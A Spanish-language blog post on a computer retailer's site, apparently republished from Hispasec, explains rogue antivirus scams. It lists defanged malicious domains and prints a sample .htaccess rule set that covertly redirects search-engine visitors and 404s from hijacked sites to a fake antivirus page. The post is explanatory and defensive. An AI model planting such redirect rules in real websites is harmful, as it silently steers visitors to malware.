Home Nosotros Servicios Links Blog Contáctenos
PRODUCTOS
Accesorios para Netbook
Accesorios Tablet PC
Auriculares y Micrófonos
Cámaras Digitales
Cámaras IP
Cables y Adaptadores
Cargadores Notebook
COMPUTADORAS
Discos
Discos Externos
Discos Multimedia
Estabilizadores / UPS
Fundas / Maletines / Mochilas
GPS
IMPRESORAS
IPOD
Memorias
Mini Proyectores
MONITORES LCD / LED
Mouse y Teclados
MP3 / MP4 / MP5
NETBOOKS
NOTEBOOKS
Pantallas p/ Proyectores
PARLANTES
Pendrives
Proyectores
REDES WIFI / LAN
Sintonizadoras de TV
Tablets PC
Televisores LCD
Toners Originales HP
Videojuegos: Accesorios
Videojuegos: Consolas
Webcams

 
oct18

Los falsos antivirus y el uso fraudulento del .htaccess de páginas legítimas

Category: Seguridad — Marcelo @ 23:46 — Comentarios desactivados

La industria antivirus “alternativa” está en pleno auge. Se trata de
antivirus falsos (llamados “rogue”) que habitualmente se hacen pasar por
una milagrosa cura para un sistema completamente infectado. Sus páginas
parecen profesionales y engañan a los usuarios a través de una animación
falsa donde supuestamente se detecta una gran cantidad de malware en el
sistema y se propone la descarga del verdadero virus para desinfectar.
Publicitar este tipo de “antivirus” es una tarea que se toman muy en
serio.
Los antivirus “rogue” no son más que malware camuflado bajo el aspecto
de un antivirus. Suelen diseñar una página de aspecto profesional desde
donde puede descargarse. Para incitar a la instalación, simulan mediante
una animación Flash que el sistema está siendo analizado en vivo y que
se ha encontrado mucho malware que el falso antivirus puede eliminar. La
animación suele ser la misma independientemente del sistema operativo
que se utilice para visitar la web. Los creadores de este malware
necesitan que se visite este tipo de páginas para que el usuario
descargue y ejecute. Resulta una alternativa a la ejecución automática
en la víctima aprovechando vulnerabilidades. Este sistema de ingeniería
social cubre por ejemplo, la “cuota de mercado” que resta de usuarios
que no pueden ser infectados a través de fallos de seguridad porque su
sistema está al día.

Los dominios que alojan este tipo de malware se han multiplicado en el
último año. Suelen tener el aspecto de: [ATENCIÓN, pueden contener
malware, NO se deben visitar a menos que se sepa lo que se está
haciendo]

antivirus-scanner-online .com, online-av-scan2008 .com,
antivirus-online-08 .com, anti-virus-xp .com, anti-virus-xp .net,
i-spyware8 .com, anti-spyware4 .com, smartantivirus2009v2 .com,
smartantivirus2009v2-buy .com, anti-spyware11 .com, anti-spyware10 .com, antivirus-cs1 .com antivirus-cs14 .com, anti-virusxp2008 .net,
antimalware09 .com, antivirxp .net, av-xp08 .net, av-xp2008 .com,
av-xp2008 .net, avx08 .net, axp2008 .com, e-antiviruspro .com,
online-security-systems .com, xpprotector .com, pvrantivirus .com,
wav2008 .com, wiav2009 .com, win-av .com, windows-av .com,
windowsav .com y un largo etcétera.

La técnica que se está observando últimamente es la del uso de banners y
anuncios (Adsense, principalmente) para invitar al usuario a la descarga
del supuesto antivirus a través de una publicidad que parece “normal”.
Incluso invierten (probablemente usando tarjetas robadas) en anuncios en
páginas legítimas. Ahora han ido un paso más allá usando el archivo
.htaccess de servidores legítimos, que consiguen controlar bien robando
sus credenciales o aprovechando fallos de seguridad del sitio.

.htaccess es un archivo de Apache que permite controlar el acceso al
directorio web donde esté alojado. Permite bloquear el acceso por
direcciones IP o por otras reglas. Una posibilidad es por ejemplo usar
el REFERER, o “desde qué página se ha llegado” y poder redirigir al
visitante en consecuencia gracias al RewriteEngine del servidor web.

Se han observado cambios como estos en los archivos .htaccess
modificados en webs legítimas.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://webdelsupuestoantivirus.com [R,L]
Errordocument 404 http://webdelsupuestoantivirus.com

Lo que resulta curioso. Si un usuario visita directamente una página web
con el .htaccess modificado de esta forma, en principio no pasará nada.
Pero si la visita se realiza desde uno de los buscadores que aparecen
(la víctima viene de Google, AOL, msn…), como el HTTP_REFERER cumple
una de las condiciones de la expresión regular, será redirigido según la
regla “RewriteRule” a la web del supuesto antivirus de forma automática.
También si se visita una web que no exista (el servidor devuelve un
404).

Resulta especialmente rebuscado, pero al parecer eficaz. Los atacantes
están aprovechando cada vez más las etiquetas User-Agent y Referer del
protocolo HTTP para “personalizar” ataques. Si no son imprescindibles
para el usuario, se puede añadir una pequeña capa de protección modificando estos valores través de un proxy. Por supuesto, además,
conviene descargar y utilizar antivirus sólo de marcas reconocidas.

Fuente: hispasec.com

Etiquetas:
«
»
 

 

Lo siento, ya no se aceptan comentarios.

 
website version 2.1 Buenos Aires - Argentina - © 2006-2012 - AMPM Soluciones Informáticas - Todos los derechos reservados.